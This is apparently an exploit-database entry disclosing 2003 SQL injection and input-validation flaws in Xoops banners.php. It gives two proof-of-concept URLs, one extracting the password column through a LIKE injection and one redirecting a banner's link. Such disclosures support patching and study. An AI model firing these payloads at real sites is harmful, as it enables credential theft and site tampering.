Xoops 1.3.x/2.0.x - Multiple Vulnerabilities

Author: frog
type: webapps
platform: php
port: 
date_added: 2003-12-06 
date_updated: 2012-12-16 
verified: 1 
codes: OSVDB-4596 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9166/info

Multiple vulnerabilities were reported in Xoops. These issues include SQL injection and input validation issues that will allow remote attackers to manipulate banners and local variables. Exploitation could compromise the software or have other consequences.

http://www.example.com/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'
/*

http://www.example.com/banners.php?op=Change&cid=-1&bid=100&url=HTTP://WWW.NEWURL.C
OM